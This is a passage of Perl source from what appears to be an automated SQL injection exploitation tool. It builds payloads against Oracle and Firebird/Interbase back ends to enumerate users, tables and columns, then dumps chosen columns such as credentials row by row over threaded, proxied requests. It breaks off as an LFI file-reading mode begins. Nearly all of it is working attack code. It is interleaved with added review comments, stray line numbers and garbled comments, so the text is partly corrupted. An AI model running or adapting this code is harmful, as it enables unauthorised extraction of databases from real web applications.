  }
}
# Encode a string as chr(n)||chr(n)||... (Oracle concatenation); the result
# contains no quote characters. For detection: long runs of "chr(NN)||chr(NN)"
# in request parameters are a distinctive artefact of this encoder.
# Uses package globals ($str1, $aa, $bb, $i), so it clobbers the caller's $i.
# The `($)` prototype only imposes scalar context on the argument.
sub char_p($) {
         $str1=$_[0];
         $aa="";$bb="";
         for ($i = 0; $i<length($str1); $i++ ) {
             $aa =  ord(substr($str1,$i,1));
             if ( $i == 0 ) {$bb= "chr(" . $aa . ")";} else { $bb= $bb. "||chr(" . $aa . ")" ;}
         }
         return "$bb";
}
# Oracle mode menu; $choice is a package global reused by every sub-menu below.
print "----------------------------------------------------------\n";
print "               Choose mode:\n";
print "----------------------------------------------------------\n";
print "    [1] Oracle SQL inj system information\n";
print "    [2] Oracle SQL inj get tables from sys.user_tables\n";
print "    [3] Oracle SQL inj get column_name from table\n";
print "    [4] Oracle SQL inj get data from columns\n";
print "    =======================================================\n";
print "    [5] Main menu\n";
print "----------------------------------------------------------\n";
$choice = <STDIN>;
chomp $choice;
print "Your choice: $choice\n";
if ($choice == 1) {
     # Oracle menu item 1: two fixed queries (V$VERSION banner, current USER).
     # Extracted values are located by the literal "ussr...ussr" delimiters the
     # payload wraps around them — a stable string to alert on in web logs.
     # $o_convert presumably names the conversion function suffix (to_<...>) — TODO confirm.
     open( FILE, ">>" . "z_" . $host . ".txt" ); # append-mode results log; 2-arg open, unchecked
     $url1 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(BANNER)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . 'V$VERSION' . $o_filtr;
     $url2 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(USER)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . 'sys.dual' . $o_filtr;
     @array = ($url1,$url2);
     $size = @array; # number of queries (2)
     $thr = $kol_threads; # number of worker threads; 0..$thr starts $thr+1 workers for only two jobs
     $num = -1; # shared work counter, pre-incremented by each worker
     print "-----------------------------------------\n";
     print "System information:\n";
     print "-----------------------------------------\n";
     print FILE  "-----------------------------------------\n";
     print FILE  "HOST: $host\n";
     print FILE "-----------------------------------------\n";
     print FILE "System information:\n";
     print FILE "-----------------------------------------\n";
     print "Request method - $method\n";
     print "Threads - $kol_threads\n";
     print "Proxy - $proxy_message\n";
     print "----------------------\n";
     for(0..$thr) {
        $trl[$_] = threads->create(\&gets741);
     }
     for(0..$thr) {
        $trl[$_]->join;
     }
     # Worker: the bound check is outside the lock, so workers can increment $num
     # past 1 and then call scan_url() with an undefined $current.
     sub gets741 {
        $| = 1;
        while ($num<$size) {
            { lock($num);
            $num++; }
            $current = $array[$num];
            if ($num == 0) {$mess = 'version: '}
            if ($num == 1) {$mess = "user: "}
            $content = scan_url();
            if ($content =~ m/ussr(.*?)ussr/imgs) {
                  print $mess . $1 . "\n";
                  print FILE $mess . $1 . "\n";
            }
            print $num . "\r";
            sleep $pause;
        }
     }
     print "----------\n";
     print "Saved in " . "z_" . $host . ".txt\n";
     close(FILE);
     goto START_o;
}
if ($choice == 2) {
     # Oracle menu item 2: count sys.user_tables, then fetch TABLE_NAME by ROWNUM,
     # one request per row, across $thr+1 threads.
     open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log; 2-arg open, unchecked
     $current = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(count(*))" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . 'sys.user_tables' . $o_filtr;
     #print FILE $current . "\n";
     $content = scan_url();
     $tab_num = $content;
     $tab_num =~ m/ussr(.*?)ussr/img;
     $tab_num = $1; # table count; if the match failed, $1 is stale (previous capture)
     print "-----------------------------------------\n";
     print "Tables in sys.user_tables - $1\n";
     print "-----------------------------------------\n";
     ## start from2 ##
     print "Get ALL tables from information_schema ($1) ? (1/0): ";   # prompt text says information_schema; the query targets sys.user_tables
     $choice = <STDIN>;
     chomp $choice;
     $thr = $kol_threads; # number of worker threads
     if ($choice == 1) {
          $num = 0; # start position (workers pre-increment, so the first ROWNUM requested is 1)
     } else {
          print "Enter START_position: ";
          $choice1 = <STDIN>;
          chomp $choice1;
          $num = $choice1-1;
          print "Enter END_position: ";
          $choice2 = <STDIN>;
          chomp $choice2;
          $tab_num = $choice2;
          print "Dump records from [" . ($num+2) . "] to [" . ($tab_num) . "]\n";
     }
     print "-----------------------------------------\n";
     ## end from2
     print FILE  "-----------------------------------------\n";
     print FILE  "Tables in sys.user_tables - $1\n";
     print FILE  "-----------------------------------------\n";
     # Row-selector query; "R=<n>" is appended per request below.
     $url12 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(T.TN)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . "(SELECT". $o_plus ."ROWNUM". $o_plus ."R,TABLE_NAME". $o_plus ."TN". $o_plus ."FROM". $o_plus ."sys.user_tables)". $o_plus ."T". $o_plus ."WHERE";
     print "Request method - $method\n";
     print "Threads - $kol_threads\n";
     print "Proxy - $proxy_message\n";
     print "----------------------\n";
     for(0..$thr) {
         $trl[$_] = threads->create(\&gets742);
     }
     for(0..$thr) {
         $trl[$_]->join;
     }
     # Worker: claim next ROWNUM under lock, fetch it, log the "ussr...ussr" capture.
     # Bound check is outside the lock; FILE writes from threads are unserialised.
     sub gets742 {
       $| = 1;
       while ($num<$tab_num) {
         { lock($num);
         $num++; }
         $current = $url12 . $o_plus . "R=" . $num . $o_filtr;
         $content = scan_url();
         if ($content =~ m/ussr(.*?)ussr/imgs) {
                  print $1 . "\n";
                  print FILE $1 . "\n";
         }
         print $num . "\r";
         sleep $pause;

       }
     }
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE);
    goto START_o;
}
if ($choice == 3) {
     # Oracle menu item 3: list COLUMN_NAME for one table from sys.user_tab_columns.
     # The table name is sent as a chr()||chr() chain (char_p) so the payload carries no quotes.
    open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log; 2-arg open, unchecked
    print "-----------------------------------------\n";
    print "Enter the table_name: ";
    $choice = <STDIN>;
    chomp $choice;
    print "Table: $choice\n";
    print "----------\n";
    print FILE  "-----------------------------------------\n";
    print FILE  "Table [ $choice ]\n";
    print FILE  "-----------------------------------------\n";
    $table_name1 = $choice;            # human-readable name, for output only
    $table_name = char_p ($choice);    # encoded form used in the query
    $current = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(count(*))" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . "sys.user_tab_columns" . $o_plus . "WHERE" . $o_plus . "TABLE_NAME=" . $table_name . $o_filtr;
    $content = scan_url();
    $content =~ m/ussr(.*?)ussr/img;
    $colum_number = $1; # column count; stale $1 if the match failed
    print "Number of columns in " . $table_name1 . ": $colum_number\n";
    print FILE  "Number of columns in " . $table_name1 . ": $colum_number\n";
    print "----------\n";
    ## Fetch column names by ROWNUM ##
    $thr = $kol_threads; # number of worker threads
    $num = 0; # shared work counter; first ROWNUM requested is 1
    print "Request method - $method\n";
    print "Threads - $kol_threads\n";
    print "Proxy - $proxy_message\n";
    print "----------------------\n";
    $url12 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(T.TN)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . "(SELECT". $o_plus ."ROWNUM". $o_plus ."R,COLUMN_NAME". $o_plus ."TN". $o_plus ."FROM". $o_plus ."sys.user_tab_columns". $o_plus ."WHERE". $o_plus ."TABLE_NAME=" . $table_name . ")". $o_plus ."T". $o_plus ."WHERE";
    print FILE  "Columns in " . $table_name1 . "\n";
    for(0..$thr) {
         $trl[$_] = threads->create(\&gets743);
    }
    for(0..$thr) {
         $trl[$_]->join;
    }
    # Worker: same shape as gets742 (bound check outside the lock, unserialised FILE writes).
    sub gets743 {
       $| = 1;
       while ($num<$colum_number) {
         { lock($num);
         $num++; }
         $current = $url12 . $o_plus . "R=" . $num . $o_filtr;
         $content = scan_url();
         if ($content =~ m/ussr(.*?)ussr/imgs) {
                  print "   " . $1 . "\n";
                  print FILE "  "  . $1 . "\n";
         }
         print $num . "\r";
         sleep $pause;

       }
    }
    print FILE "----------\n";
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE);
    goto START_o;
}
if ($choice == 4) {
    # Oracle menu item 4: dump chosen columns of one table by ROWNUM, one request per row.
    open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log; 2-arg open, unchecked
    print "-----------------------------------------\n";
    print "Enter the table_name: ";
    $choice = <STDIN>;
    chomp $choice;
    $table_name = $choice;
    $table_name1 = char_p ($choice);   # encoded form; assigned but not used anywhere in this branch
    print "Table: $table_name\n";
    print "-----------------------------------------\n";
    print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
    $choice = <STDIN>;
    chomp $choice;
    $column_name1 = $choice;
    $column_name = $choice;
    @column_spis = split(/,/,$column_name);
    $size = @column_spis;
    # Several columns are joined with chr(58) (":") so each row returns as one field.
    if ($size > 1) {
       $column_name = "";
       $a = 0;
       while ($a < $size) {
        if ($a == ($size-1)) {
          $column_name .= $column_spis[$a];
        } else {
          $column_name .= $column_spis[$a] . "||chr(58)||";
        }
          $a++;
       }
    }
    print FILE  "-----------------------------------------\n";
    print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
    print FILE  "-----------------------------------------\n";
    print "Dump column(s): [ " . $column_name1. " ] from [ " .$table_name . " ]\n";
    print "-----------------------------------------\n";
    ## Count rows in the table ##
    print "Count data from [ $table_name  ]\n";
    $current = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(count(*))" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . $table_name . $o_filtr;
    $content = scan_url();
    $column_name_p = $content;
    $column_name_p =~ m/ussr(.*?)ussr/img;
    $column_name_p = $1; # row count (doubles as the loop bound below); stale $1 if the match failed
    print "$column_name_p\n";
    print "----------\n";
    print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
    $choice = <STDIN>;
    chomp $choice;
    $thr = $kol_threads; # number of worker threads
    if ($choice == 1) {
         $num = 1; # shared work counter; workers pre-increment before use
    } else {
         print "Enter START_position: ";
         $choice1 = <STDIN>;
         chomp $choice1;
         $num = $choice1-1;
         print "Enter END_position: ";
         $choice2 = <STDIN>;
         chomp $choice2;
         $column_name_p = $choice2;
         print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p) . "]\n";
    }
    print "-----------------------------------------\n";
    print "Request method - $method\n";
    print "Threads - $kol_threads\n";
    print "Proxy - $proxy_message\n";
    print "----------------------\n";
    ## Fetch rows by ROWNUM ##
    $url17 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(T.TN)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . "(SELECT". $o_plus ."ROWNUM". $o_plus ."R," . $column_name . $o_plus ."TN". $o_plus ."FROM". $o_plus . $table_name . ")". $o_plus ."T". $o_plus ."WHERE";
    for(0..$thr) {
        $trl[$_] = threads->create(\&gets744);
    }
    for(0..$thr) {
        $trl[$_]->join;
    }
    # Worker: same shape as gets742/gets743 (bound check outside the lock, unserialised FILE writes).
    sub gets744 {
            $| = 1;
            while ($num<$column_name_p) {
               { lock($num);
               $num++; }
               $current = $url17 . $o_plus . "R=" . $num . $o_filtr;
               $content = scan_url();
               if ($content =~ m/ussr(.*?)ussr/img) {
                    print "   " . $1 . "\n";
                    print FILE "  "  . $1 . "\n";
               }
               print $num . "\r";
               sleep $pause;

            }
    }
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE);
    goto START_o;
}
if ($choice == 5) {goto START_global}   # Oracle mode menu item 5: return to the top-level menu
  7831. }
  7832. ####################################################################################################################
  7833. ## Firebird/Interbase inj ##
  7834. if ($choice == 7) {
  7835. START_fi:
# Firebird/Interbase mode set-up; mirrors the Oracle block above line for line.
# $host12 is only assigned for an https:// URL; for http:// it is presumably set
# by an earlier parse not visible here — TODO confirm.
if ($fi_source_sql =~ m/^https:\/\/?([^\/]+)/i) {
   $host12 = $1;
   $https_flag = 1;
   print "----------------------\n";
   print "HTTPS mode enabled\n";
   print "----------------------\n";
}
$host = $host12;
# One-time HTTPS login (config values from the global settings block); session cookie goes to shared $ck1.
if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
    print "-----------------------------------------\n";
    print "Authorization required, wait please....";
    my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
    $ck1 = collect($answ1);
    $https_auth_check = 1;
    print " DONE\n";
    print "-----------------------------------------\n";
}
# SOCKS selection; $check_host is not assigned in this block (see the Oracle copy) — TODO confirm where it is set.
if ($use_socks == 1 && $socks_check == 0) {
  $check_url = $host;
  our $query = "GET / HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: http://" . $check_url . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
           . "Connection: close\r\n\r\n";
   print "----------------------------------------\n";
   print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
   print "Timeout = 5 sec:\n";
   print "----------------------------------------\n";
   $socks_check = 0;
   $check_socks = socks_check();
  ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  if ($current_proxy_host) {
     $socks_check = 1;
     print "Will use --> $proxy_message\n";
  } else {
     $socks_check = 0;
     $proxy_message = "No";
     print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";   # execution continues without a proxy despite the message
  }
}
  7878. sub char_fi($) {
  7879.          $str1=$_[0];
  7880.          $aa="";$bb="";
  7881.          for ($i = 0; $i<length($str1); $i++ ) {
  7882.              $aa =  ord(substr($str1,$i,1));
  7883.              if ( $i == 0 ) {$bb= "ascii_char(" . $aa . ")";} else { $bb= $bb. "||ascii_char(" . $aa . ")" ;}
  7884.          }
  7885.          return "$bb";
  7886. }
  7887. print "----------------------------------------------------------\n";
  7888. print "               Choose mode:\n";
  7889. print "----------------------------------------------------------\n";
  7890. print "    [1] Firebird/Interbase SQL inj system information\n";
  7891. print '    [2] Firebird/Interbase SQL inj get tables from rdb$relations (non system)' . "\n";
  7892. print "    [3] Firebird/Interbase SQL inj get column_name from table\n";
  7893. print "    [4] Firebird/Interbase SQL inj get data from columns\n";
  7894. print "    =======================================================\n";
  7895. print "    [5] Main menu\n";
  7896. print "----------------------------------------------------------\n";
  7897. $choice = <STDIN>;
  7898. chomp $choice;
  7899. print "Your choice: $choice\n";
  7900. if ($choice == 1) {
  7901.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  7902.      $url1 = $fi_source_sql . "cast(" . $fi_sql_pref1 . "user" . $fi_sql_pref2 . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
  7903.      @array = ($url1);
  7904.      $size = @array; #???????? ?????? ???????
  7905.      $thr = $kol_threads; # ???-?? ???????
  7906.      $num = -1; # ?? ????????
  7907.      print "-----------------------------------------\n";
  7908.      print "System information:\n";
  7909.      print "-----------------------------------------\n";
  7910.      print FILE  "-----------------------------------------\n";
  7911.      print FILE  "HOST: $host\n";
  7912.      print FILE "-----------------------------------------\n";
  7913.      print FILE "System information:\n";
  7914.      print FILE "-----------------------------------------\n";
  7915.      print "Request method - $method\n";
  7916.      print "Threads - $kol_threads\n";
  7917.      print "Proxy - $proxy_message\n";
  7918.      print "----------------------\n";
  7919.      for(0..$thr) {
  7920.         $trl[$_] = threads->create(\&gets6011);
  7921.      }
  7922.      for(0..$thr) {
  7923.         $trl[$_]->join;
  7924.      }
     # Worker thread for the "system information" mode. @array holds the single
     # query built above ($url1, the `user` lookup) and $size its element count,
     # so only index 0 is meaningful; it is printed with the 'user: ' label.
     # NOTE(review): spawned with for(0..$thr), i.e. $thr+1 threads; because the
     # bound check sits outside the lock, the extra threads can increment $num
     # past $size and call scan_url() with $current undefined -- confirm how
     # scan_url() handles that.
     sub gets6011 {
        $| = 1;   # autoflush STDOUT for the "\r" progress counter
        while ($num<$size) {
            { lock($num);
            $num++; }   # reserve one query index per thread
            $current = $array[$num];
            if ($num == 0) {$mess = 'user: '}   # $mess is a global; only set for index 0
            # scan_url() takes no arguments; presumably reads the global $current.
            $content = scan_url();
            # The value is expected between two literal "ussr" markers (a stable
            # response-side signature); /s lets a multi-line value match.
            if ($content =~ m/ussr(.*?)ussr/imgs) {
                  print $mess . $1 . "\n";
                  print FILE $mess . $1 . "\n";
            }
            print $num . "\r";   # progress counter, overwritten in place
            sleep $pause;        # per-request delay; $pause is set elsewhere
        }
     }
  7941.      print "----------\n";
  7942.      print "Saved in " . "z_" . $host . ".txt\n";
  7943.      close(FILE);
  7944.      goto START_fi;
  7945. }
  7946. if ($choice == 2) {
  7947.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  7948.      $current = $fi_source_sql . "cast((select" . $fi_plus . $fi_sql_pref1 . 'count(rdb$relation_name)' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . 'rdb$relations' . $fi_plus . 'where' . $fi_plus . 'rdb$system_flag=0)' . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
  7949.      $content = scan_url();
  7950.      $tab_num = $content;
  7951.      $tab_num =~ m/ussr(.*?)ussr/img;
  7952.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
  7953.      print "-----------------------------------------\n";
  7954.      print 'Tables in rdb$relation (non system) - ' . $1 . "\n";
  7955.      print "-----------------------------------------\n";
  7956.      ## start from2 ##
  7957.      print 'Get ALL tables from rdb$relation ('. $1 .') ? (1/0): ';
  7958.      $choice = <STDIN>;
  7959.      chomp $choice;
  7960.      $thr = $kol_threads; # ???-?? ???????
  7961.      if ($choice == 1) {
  7962.           $num = -1; # ?? ????????
  7963.      } else {
  7964.           print "Enter START_position: ";
  7965.           $choice1 = <STDIN>;
  7966.           chomp $choice1;
  7967.           $num = $choice1-1;
  7968.           print "Enter END_position: ";
  7969.           $choice2 = <STDIN>;
  7970.           chomp $choice2;
  7971.           $tab_num = $choice2;
  7972.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num) . "]\n";
  7973.      }
  7974.      print "-----------------------------------------\n";
  7975.      ## end from2
  7976.      print FILE  "-----------------------------------------\n";
  7977.      print FILE  'Tables in rdb$relation - '. $1 . "\n";
  7978.      print FILE  "-----------------------------------------\n";
  7979.      print "Request method - $method\n";
  7980.      print "Threads - $kol_threads\n";
  7981.      print "Proxy - $proxy_message\n";
  7982.      print "----------------------\n";
  7983.      for(0..$thr) {
  7984.          $trl[$_] = threads->create(\&gets6012);
  7985.      }
  7986.      for(0..$thr) {
  7987.          $trl[$_]->join;
  7988.      }
     # Worker thread for the table-list mode. $tab_num is either the count read
     # from rdb$relations above or the user's END_position; $num starts at -1 or
     # START_position-1. Each request pages one table name with Firebird's
     # `first 1 skip $num` and prints it to STDOUT and FILE.
     # NOTE(review): the bound check is outside the lock, so indices can run
     # past $tab_num when several threads pass the test together.
     sub gets6012 {
       $| = 1;   # autoflush STDOUT for the "\r" progress counter
       while ($num<$tab_num) {
         { lock($num);
         $num++; }   # reserve one table index per thread
         # $fi_source_sql / $fi_sql_pref1 / $fi_sql_pref2 / $fi_plus / $fi_convert /
         # $fi_filtr are the request template pieces set elsewhere in the script.
         $current = $fi_source_sql . "cast((select" . $fi_plus . 'first' . $fi_plus . '1' . $fi_plus . 'skip' . $fi_plus . $num . $fi_plus . 'distinct' . $fi_plus . $fi_sql_pref1 . 'rdb$relation_name' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . 'rdb$relations' . $fi_plus . 'where' . $fi_plus . 'rdb$system_flag=0)' . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
         # scan_url() takes no arguments; presumably reads the global $current.
         $content = scan_url();
         # Value expected between two literal "ussr" markers (a stable
         # response-side signature for this tool's traffic).
         if ($content =~ m/ussr(.*?)ussr/imgs) {
                  print $1 . "\n";
                  print FILE $1 . "\n";
         }
         print $num . "\r";   # progress counter, overwritten in place
         sleep $pause;        # per-request delay; $pause is set elsewhere
 
       }
     }
  8005.     print "----------\n";
  8006.     print "Saved in " . "z_" . $host . ".txt\n";
  8007.     close(FILE);
  8008.     goto START_fi;
  8009. }
  8010. if ($choice == 3) {
  8011.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  8012.     print "-----------------------------------------\n";
  8013.     print "Enter the table_name: ";
  8014.     $choice = <STDIN>;
  8015.     chomp $choice;
  8016.     print "Table: $choice\n";
  8017.     print "----------\n";
  8018.     print FILE  "-----------------------------------------\n";
  8019.     print FILE  "Table [ $choice ]\n";
  8020.     print FILE  "-----------------------------------------\n";
  8021.     $table_name1 = $choice;
  8022.     $table_name = char_fi ($choice);
  8023.     $current = $fi_source_sql . "cast((select" . $fi_plus . $fi_sql_pref1 . 'count(rdb$field_name)' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . 'rdb$relation_fields' . $fi_plus . 'where' . $fi_plus . 'rdb$system_flag=0' . $fi_plus . 'and' . $fi_plus . 'rdb$relation_name=' . $table_name . ")" . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
  8024.     $content = scan_url();
  8025.     $content =~ m/ussr(.*?)ussr/img;
  8026.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
  8027.     print "Number of columns in " . $table_name1 . ": $colum_number\n";
  8028.     print FILE  "Number of columns in " . $table_name1 . ": $colum_number\n";
  8029.     print "----------\n";
  8030.     ## ?????? ??????? ##
  8031.     $thr = $kol_threads; # ???-?? ???????
  8032.     $num = -1; # ?? ????????
  8033.     print "Request method - $method\n";
  8034.     print "Threads - $kol_threads\n";
  8035.     print "Proxy - $proxy_message\n";
  8036.     print "----------------------\n";
  8037.     print FILE  "Columns in " . $table_name1 . "\n";
  8038.     for(0..$thr) {
  8039.          $trl[$_] = threads->create(\&gets6013);
  8040.     }
  8041.     for(0..$thr) {
  8042.          $trl[$_]->join;
  8043.     }
    # Worker thread for the column-list mode. $colum_number is the count read
    # from rdb$relation_fields above; $table_name is the char_fi()-encoded table
    # name. Each request pages one field name with `first 1 skip $num` and
    # prints it (indented) to STDOUT and FILE.
    # NOTE(review): bound check outside the lock -- same overrun as the other
    # gets* workers.
    sub gets6013 {
       $| = 1;   # autoflush STDOUT for the "\r" progress counter
       while ($num<$colum_number) {
         { lock($num);
         $num++; }   # reserve one column index per thread
         # Request template pieces ($fi_*) are set elsewhere in the script.
         $current = $fi_source_sql . "cast((select" . $fi_plus . 'first' . $fi_plus . '1' . $fi_plus . 'skip' . $fi_plus . $num . $fi_plus . 'distinct' . $fi_plus . $fi_sql_pref1 . 'rdb$field_name' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . 'rdb$relation_fields' . $fi_plus . 'where' . $fi_plus . 'rdb$system_flag=0' . $fi_plus . 'and' . $fi_plus . 'rdb$relation_name=' . $table_name . ")" . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
         # scan_url() takes no arguments; presumably reads the global $current.
         $content = scan_url();
         # Value expected between two literal "ussr" markers.
         if ($content =~ m/ussr(.*?)ussr/imgs) {
                  print "    " . $1 . "\n";
                  print FILE "    " . $1 . "\n";
         }
         print $num . "\r";   # progress counter, overwritten in place
         sleep $pause;        # per-request delay; $pause is set elsewhere
 
       }
    }
  8060.     print FILE "----------\n";
  8061.     print "----------\n";
  8062.     print "Saved in " . "z_" . $host . ".txt\n";
  8063.     close(FILE);
  8064.     goto START_fi;
  8065. }
  8066. if ($choice == 4) {
  8067.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  8068.     print "-----------------------------------------\n";
  8069.     print "Enter the table_name: ";
  8070.     $choice = <STDIN>;
  8071.     chomp $choice;
  8072.     $table_name = $choice;
  8073.     $table_name1 = char_fi ($choice);
  8074.     print "Table: $table_name\n";
  8075.     print "-----------------------------------------\n";
  8076.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  8077.     $choice = <STDIN>;
  8078.     chomp $choice;
  8079.     $column_name1 = $choice;
  8080.     $column_name = $choice;
  8081.     @column_spis = split(/,/,$column_name);
  8082.     $size = @column_spis;
  8083.     if ($size > 1) {
  8084.        $column_name = "";
  8085.        $a = 0;
  8086.        while ($a < $size) {
  8087.         if ($a == ($size-1)) {
  8088.           $column_name .= $column_spis[$a];
  8089.         } else {
  8090.           $column_name .= $column_spis[$a] . "||ascii_char(58)||";
  8091.         }
  8092.           $a++;
  8093.        }
  8094.     }
  8095.     print FILE  "-----------------------------------------\n";
  8096.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
  8097.     print FILE  "-----------------------------------------\n";
  8098.     print "Dump column(s): [ " . $column_name1. " ] from [ " .$table_name . " ]\n";
  8099.     print "-----------------------------------------\n";
  8100.     ## ?????? ???-?? ???????? ?? ??????? #
  8101.     print "Count data from [ $table_name  ]\n";
  8102.     $current = $fi_source_sql . "cast((select" . $fi_plus . $fi_sql_pref1 . 'count(*)' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . $table_name . ")" . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
  8103.     $content = scan_url();
  8104.     $column_name_p = $content;
  8105.     $column_name_p =~ m/ussr(.*?)ussr/img;
  8106.     $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  8107.     print "$column_name_p\n";
  8108.     print "----------\n";
  8109.     print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
  8110.     $choice = <STDIN>;
  8111.     chomp $choice;
  8112.     $thr = $kol_threads; # ???-?? ???????
  8113.     if ($choice == 1) {
  8114.          $num = -1; # ?? ????????
  8115.     } else {
  8116.          print "Enter START_position: ";
  8117.          $choice1 = <STDIN>;
  8118.          chomp $choice1;
  8119.          $num = $choice1-1;
  8120.          print "Enter END_position: ";
  8121.          $choice2 = <STDIN>;
  8122.          chomp $choice2;
  8123.          $column_name_p = $choice2;
  8124.          print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p) . "]\n";
  8125.     }
  8126.     print "-----------------------------------------\n";
  8127.     print "Request method - $method\n";
  8128.     print "Threads - $kol_threads\n";
  8129.     print "Proxy - $proxy_message\n";
  8130.     print "----------------------\n";
  8131.     ## ?????? ?????? ?? ??????? ##
  8132.     for(0..$thr) {
  8133.         $trl[$_] = threads->create(\&gets6014);
  8134.     }
  8135.     for(0..$thr) {
  8136.         $trl[$_]->join;
  8137.     }
    # Worker thread for the data-dump mode. $column_name_p is either the row
    # count read above or the user's END_position; $column_name is the
    # user-entered column list, joined with "||ascii_char(58)||" when more than
    # one column was given; $table_name is the raw table name. One row per
    # request via `first 1 skip $num`, cast to char(30000).
    # NOTE(review): bound check outside the lock -- same overrun as the other
    # gets* workers.
    sub gets6014 {
            $| = 1;   # autoflush STDOUT for the "\r" progress counter
            while ($num<$column_name_p) {
               { lock($num);
               $num++; }   # reserve one row index per thread
               # Request template pieces ($fi_*) are set elsewhere in the script.
               $current = $fi_source_sql . "cast((select" . $fi_plus . 'first' . $fi_plus . '1' . $fi_plus . 'skip' . $fi_plus . $num . $fi_plus . 'distinct' . $fi_plus . 'cast(' . $fi_plus . $fi_sql_pref1 . $column_name . $fi_sql_pref2 . $fi_plus . 'as' . $fi_plus . 'char(30000))' . $fi_plus . 'from' . $fi_plus . $table_name . ")" . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
               # scan_url() takes no arguments; presumably reads the global $current.
               $content = scan_url();
               # Value expected between two literal "ussr" markers. Unlike
               # gets6011-gets6013 there is no /s flag, so a value containing a
               # newline is not captured here.
               if ($content =~ m/ussr(.*?)ussr/img) {
                    print "   " . $1 . "\n";
                    print FILE "  "  . $1 . "\n";
               }
               print $num . "\r";   # progress counter, overwritten in place
               sleep $pause;        # per-request delay; $pause is set elsewhere
 
            }
    }
  8154.     print "----------\n";
  8155.     print "Saved in " . "z_" . $host . ".txt\n";
  8156.     close(FILE);
  8157.     goto START_fi;
  8158. }
  8159. if ($choice == 5) {goto START_global}
  8160. }
  8161. ###################################################################################################################
  8162. ## LFI/Reader/Load_file() bruter mode ##
  8163. if ($choice == 8) {
  8164. if ($lrl_url =~ m/^https:\/\/?([^\/]+)/i) {
  8165.    $host2 = $1;
  8166.    $https_flag = 1;
  8167.    print "----------------------\n";
  8168.    print "HTTPS mode enabled\n";
  8169.    print "----------------------\n";
  8170. }
  8171. $host = $host2;
  8172. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  8173.     print "-----------------------------------------\n";
  8174.     print "Authorization required, wait please....";
  8175.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  8176.     $ck1 = collect($answ1);
  8177.     $https_auth_check = 1;
  8178.     print " DONE\n";
  8179.     print "-----------------------------------------\n";
  8180. }
  8181.     if ($use_socks == 1 && $socks_check == 0) {
  8182.   $check_url = $host;
  8183.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  8184.            . "Host: $check_host\r\n"
  8185.            . "Referer: http://" . $check_url . "\r\n"
  8186.            . "Accept: */*\r\n"
